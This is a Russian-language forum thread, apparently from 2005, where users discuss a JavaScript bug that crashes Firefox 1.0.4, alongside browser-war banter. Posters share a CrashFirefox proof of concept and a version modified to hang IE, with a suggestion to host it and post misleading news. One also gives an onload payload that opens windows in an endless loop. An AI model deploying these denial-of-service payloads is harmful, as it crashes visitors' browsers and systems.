ff 1.0.4 winxp - работает
дома на mozill`е проверю

Источник - uinc.ru

Работает-работает и на ff4 под линукс и под windows-( Ждем багфигка, берем из nightly -)

В качестве меры противодействия рекомендуется выклуючить ПК.

Это уже диагноз

новая дырка каждую неделю :)

>Это уже диагноз новая дырка каждую неделю :)

Ну не совсем дырка, темболее совсем неопасная

> В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.

Еще бы убедить идиотов-вебламеров, чтобы делали сайты по нормальному:
то есть так, чтобы джопаскрипт не был единственным вариантом навигации...

Так для этого есть Preference tool bar - одним кликом отключаешь и включаешь JS :)

В качестве меры противодействия рекомендуется выкинуть Mozilla soft и выпить йаду)

А вот как это осуществляется

Вот функция, которая вешает Мозиллу:

function CrashFirefox()
{
    //Run the function 20000 times
    for (a = 0; a <= 20000; a++)
    {
        //Here is the special code that terminates the browser
        function(){};
    }
	
    //Displays an alert to notify the user if the browser is not vulnerable.
    alert("Good news - Your browser is not vulnerable.");
}

Короче, просто в цикле порождается много пустых функций. И Мозилла падает. Что характерно - IE нормально (и очень быстро) отрабатывает. Похоже, там защита стоит от этого.

Есть теория, что бесконечное число мартышек с компьютерами когда-нибудь смогут написать "Войну и мир". Она до сих пор не доказана. Зато точно известно, что под силу бесконечному числу мартышек - находить новые уязвимости в браузерах.

Работает, хотя у меня из функций жабаскрипт включено только изменение изображений - в первом случае окно закрывается, во втором - зависает.

Сорри, затупил. Конечно же, функции не порождаются. Всё-таки, это кривизна. Пусть исправляют.

Во второй раз по первой ссылке тоже зависло.

>В качестве меры противодействия рекомендуется выклуючить ПК.
возможное падение браузера настолько критичнo?

> Так для этого есть Preference tool bar - одним кликом отключаешь и включаешь JS :)

ага, сразу после падения браузера...

глупый баг какой-то :)

>Есть теория

закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

firefox 1.0.4 c mozilla.org падает firefox 1.0.2 из убунту уже нет

Слава ВЕЛИКОМУ МАНИТУ , Шо Я использую непревзойденный бровзер ИЕ! а то б валялся б щас где-нибудь на дне Ниагарского водопада!

Это хорошо, что код чистят понемногу. Слава мартышкам!

а knoqueror-у хоть бы хны :)

// wbr

Достала джава эта дырявая. Из-за неё больше половины всех дыр. Обычная ссылка уже не катит? Че все пихают куда надо и куда не надо эту пакость?

А еще если мышкой помахать на FF проц грузит чрезмерно.

Бред это всё собачий!!!

Народ кто нить положите где-нить на сайте у себя

ту же страничку, только

функцию CrashFirefox замените на приведённую ниже....

и запостите новость типа, IE зависает намертво ещё и грузя ресурсы машины офигенно.... Хотя тот же самый Firefox предлагает прервать слишком долгий скрипт....

function CrashFirefox() { var test = 0; //Run the function 20000 times for (a = 0; a <= 1000000; a++) { //Here is the special code that terminates the browser test = test + function( test ){ return test++;}; } document.write(test); //Displays an alert to notify the user if the browser is not vul alert("Good news - Your browser is not vulnerable."); }

Ну почему уязвимость то? Дебилизм уже просто.. Это же обычный BUG. Писец.. все помешаны на "уязвимостях".. В чём тут уязвимость то? И уязвимость чего? брр... бесит

>А еще если мышкой помахать на FF проц грузит чрезмерно.

потому что это магия высшего порядка, недоступная виндовозному ламерью

> Достала джава эта дырявая.

Достали дятлы, неспособные отличить java от javascript

Ура! Заработало!

> закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

Сколько развелось разных трактований ЗВЧ. Он же говорит при каких условиях на последовательность случайных чисел En, (1/n)Sum|En-MEn| сходится к 0 за вероятностью.

Хороший повод с дрявой мозиллы перейти на Оперу

> Хороший повод с дрявой мозиллы перейти на Оперу

Я уже для IE написал чрень которая будет вешать IE как нефик делать...

Написать тоже самой для Oper-ы?

> Хороший повод с дрявой мозиллы перейти на Оперу

Ты у нас всегда навстречу основному потоку движешься? Сейчас вообще-то люди в основном с оперы на ff переползают.

Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 -- работает :,(

только не к нулю, а к матожиданию Еn по вероятности.

> только не к нулю, а к матожиданию Еn по вероятности.

давай зачотку!

и отловить корок. мсье понимает толк в извращениях

мда. вот вам тогда еще одна "уязвимость" - нашел еще года два назад. Мозилла просто падает, ИЕ пораждает множество окон и если вовремя не прибить, то уносит за собой ОС, на других браузерах не пробовал, если кто попробует, то напишите о поведении... <body onload="javascript:for(;;)open('http://ie.sux/')">

в неё надо поставить неуд :)

ибо к нулю! т.к. ЗБЧ говорит о сходимости среднего арифметического величин к среднему арифметическому матожиданий